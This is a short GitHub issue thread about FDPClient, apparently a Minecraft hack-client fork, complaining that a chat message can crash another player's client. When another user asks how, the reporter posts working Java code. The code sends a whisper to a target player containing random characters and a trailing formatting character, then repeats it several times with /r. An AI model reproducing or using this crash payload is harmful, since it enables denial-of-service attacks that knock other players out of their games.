### ISSUE TITLE
for god sake you can literally crash a client via a chat message

### ISSUE THREAD

**Issue by DoubleHexagon** [Project-EZ4H/FDPClient#9]
how is this lb fork this bad

**Comment by BotNC** [comment]
fdp client best client!!!! no crash message chat!!!!

**Comment by liulihaocai** [comment]
bro how 2

**Comment by DoubleHexagon** [comment]
String crasherMessage = String.join(" ", "/tell", entity.getName(), RandomStringUtils.random(16), "\247");
PacketUtil.sendPacketNoEvent(new C01PacketChatMessage(crasherMessage));
for (int i = 0; i < 4; i++) {
    PacketUtil.sendPacketNoEvent(new C01PacketChatMessage("/r " + crasherMessage));
}
